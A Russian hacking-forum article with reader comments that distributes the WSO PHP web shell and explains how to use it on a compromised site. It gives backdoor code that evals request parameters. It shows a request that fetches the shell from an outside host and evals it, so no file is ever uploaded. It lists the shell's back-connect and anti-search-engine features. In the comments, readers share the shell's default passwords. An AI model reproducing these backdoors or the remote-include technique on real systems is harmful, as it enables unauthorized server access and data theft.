Мы в твиттере Мы в телеграме!

PROWEBBER » Web » Полезные статьи » WSO - веб шелл


WSO - веб шелл

Данный материал предоставлен сайтом ProWebber.cc исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое.
Скачать бесплатно WSO - веб шелл.



Не то чтобы статья, но многим будет полезно. Итак, мы проникли в админку, мы в итоге смогли хоть куда-то впихнуть такой код, примеру:
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

или просто:
assert(stripslashes($_REQUEST[lala]));

stripslashes в данном случае исключительно для обхода magic_quotes=ON
Многие вставляют
system($_GET['cmd'])
и прочие безобразия, но это все лишнее, на самом деле все проще. Итак, вы вставили данный код куда-то (в faq.php, или у вас уже есть просто типо такой бекдор где-то в недрах скриптов сервера).
Т.е. в итоге вы к примеру добились работоспособности вот такого линка:
http://localhost/user.php?e=phpinfo(); 

И после этого у многих начинающих ступор. Немедленно следующий вопрос - а что же делать дальше?
А давайте повнимательнее взглянем на этот phpinfo, что нам вывело, основные два пункта, что нас будут интересовать в данной ситуации:
allow_url_fopen
allow_url_include


allow_url_include
- да, жесть конечно, но, как правило, off.

Остается
allow_url_fopen
, а он, как правило = ON. Как же мы может использовать данную возможность, безрассудно оставленную админом, чтобы не париться особо (не искать папки, доступные на запись и тому подобную ерунду выяснять да и вообще не заливать шелл как таковой, но лазить по серваку как-будто шелл уже залит). Да очень просто. Если
allow_url_fopen = ON
и у вас есть код, выводящий хотя бы
PHPINFO();
то считайте вы уже прочитали все конфиги, слили все что вам надо и т.д. (не путайте с "порутать", только то, что можно прочитать)

Берем последний шелл от глубокоуважаемого oRb, удаляем первую строчку:
<?php # Web Shell by oRb

+
удаляем последнюю
?>

+
можно удалить пароль, шелл ведь не заливаем, просто юзаем, не оставляя

сохраняем на любой хост как bla_bla.txt (тот же narod.ru вполне подойдет) или в виде картинки на файлообменнике, предоставляющем прямые ссылки на скачку контента и делаем такой запрос:
Код:
http://localhost/user.php?a=eval(file_get_contents('http://site.ru/bla_bla.txt'));

Всё. У вас полноценный шелл без физического его залития на сервак со всеми обычными возможностями шелла. Спасибо за внимание
PS: tested on WSO2.4 (wso2_pack.php)

Описание шелла:
Авторизация
Информация о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Работа со строками + поиск хеша в онлайн базах
Биндпорт и бек-коннект (Perl)
Поиск текста в файлах
*nix/Windows
Из фишек
Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (24.32 KB)
Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Автор статьи: Pashkela
Автор шелла: oRb

Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

Скачать шелл:
Внимание! У Вас нет прав для просмотра скрытого текста.



Дополнительные ссылки на скачивание ТОЛЬКО для зарегистрированных


0
Просмотры: 24 813 :: Комментарии (21) :: :: Нужна помощь? Задайте вопрос на форуме ::
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

#1hecz

  • 9 ноября 2010 16:13
  • Регистрация: 24.02.2010
  • Был(а) онлайн: 5.01.2014
  • Комментариев: 92
  • 0
а какой $auth_pass = "63a9f0ea7bb98050796b649e85481845";

--------------------

#2Пряник

  • 9 ноября 2010 16:35
  • Регистрация: 26.09.2010
  • Был(а) онлайн: 20.08.2012
  • Комментариев: 53
  • 0
Зачетно! Надо испытать как нибудь на досуге...

#3artur3333

  • 9 ноября 2010 16:40
  • Регистрация: 9.09.2010
  • Был(а) онлайн: 18.01.2014
  • Комментариев: 89
  • 0
спс,протестим ! Может кто поможет разобратся с этим всем?

--------------------

#4DEADok

  • 9 ноября 2010 16:49
  • Регистрация: 8.11.2009
  • Был(а) онлайн: 8.06.2019
  • Комментариев: 49
  • 0
паролько какой чтобы этот шел юзать?

#5f1xed

  • 9 ноября 2010 17:32
  • Регистрация: 18.02.2010
  • Был(а) онлайн: 12.07.2013
  • Комментариев: 79
  • 0
хорошая очень вещь
для тех, кто в танке: пароль в мд5, если его расшифровать, то получится root
пароль для шелла: root

--------------------

#6alexcreew

  • 10 ноября 2010 11:51
  • Регистрация: 10.11.2010
  • Был(а) онлайн: 11.08.2016
  • Комментариев: 11
  • 0
Да, вещица хорошая

#7gad

  • 10 ноября 2010 22:52
  • Регистрация: 7.11.2010
  • Был(а) онлайн: 15.11.2010
  • Комментариев: 1
  • 0
ой бля я не могу Админ, меня пед*раса фотку Выложыл бля бля yahoo rofl

#8laid18

  • 11 ноября 2010 00:14
  • Регистрация: 21.10.2010
  • Был(а) онлайн: 19.08.2012
  • Комментариев: 62
  • 0
gad,
Ты наверное на провеббер доступа хочеш лешится?!

#9Dr. Neo

  • 11 ноября 2010 01:41
  • Регистрация: 3.12.2009
  • Был(а) онлайн: 19.10.2019
  • Комментариев: 393
  • -1
Хватит бл*ть х*йню писать. Никто сюда уже ничего не зальет нах!

#10Joey

  • 17 ноября 2010 18:26
  • Регистрация: 5.01.2010
  • Был(а) онлайн: 31.03.2020
  • Комментариев: 266
  • 0
WSOmanager
а от него какой пароль?

#11WebSupport

  • 17 ноября 2010 19:00
  • Регистрация: 15.11.2010
  • Был(а) онлайн: 24.06.2015
  • Комментариев: 225
  • 0
А какой от него толк вообще?

#12mitrushi

  • 17 ноября 2010 19:16
  • Регистрация: 4.01.2010
  • Был(а) онлайн: 3.11.2016
  • Комментариев: 160
  • 0
Цитата: Joey
WSOmanagerа от него какой пароль?

логин: root
пароль: toor
и пароль для самого шелла: root

#13WebSupport

  • 17 ноября 2010 19:19
  • Регистрация: 15.11.2010
  • Был(а) онлайн: 24.06.2015
  • Комментариев: 225
  • 0
mitrushi, благодарю

#14Rednex

  • 8 июня 2011 18:51
  • Регистрация: 8.06.2011
  • Был(а) онлайн: 10.06.2011
  • Комментариев: 10
  • 0
спасибо за статью )

#15mitrushi

  • 10 октября 2011 00:15
  • Регистрация: 4.01.2010
  • Был(а) онлайн: 3.11.2016
  • Комментариев: 160
  • 0
Многоуважаемый oRb обновил шелл до версии WSO 2.5.1

#16IceSkip

  • 10 октября 2011 00:32
  • Регистрация: 11.08.2011
  • Был(а) онлайн: 14.11.2012
  • Комментариев: 149
  • 0
gj.pf. yf ljceut//,kfujlfh. pf byae

прикольно,надо будет попробовать на досуге,благодарю

--------------------

#17Serj566

  • 26 декабря 2011 13:41
  • Регистрация: 17.12.2011
  • Был(а) онлайн: 20.01.2022
  • Комментариев: 3
  • 0
Надо попробовать этот способ!

#18evgeny56

  • 30 июня 2012 14:44
  • Регистрация: 28.06.2012
  • Был(а) онлайн: 25.08.2012
  • Комментариев: 11
  • 0
спасибо за статью angel

#19suord

  • 19 декабря 2012 05:27
  • Регистрация: 15.11.2010
  • Был(а) онлайн: 27.12.2012
  • Комментариев: 21
  • 0
спасибо интересно почитать било

#20Vinny_pad

  • 22 марта 2014 18:20
  • Регистрация: 5.07.2013
  • Был(а) онлайн: 7.04.2014
  • Комментариев: 43
  • 0
постер вообще в тему

--------------------

1 2
Предыдущая    Следующая
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Архив новостей
Май 2022 (242)
Апрель 2022 (440)
Март 2022 (244)
Февраль 2022 (204)
Январь 2022 (262)
Декабрь 2021 (160)
Друзья сайта

Последние комментарии: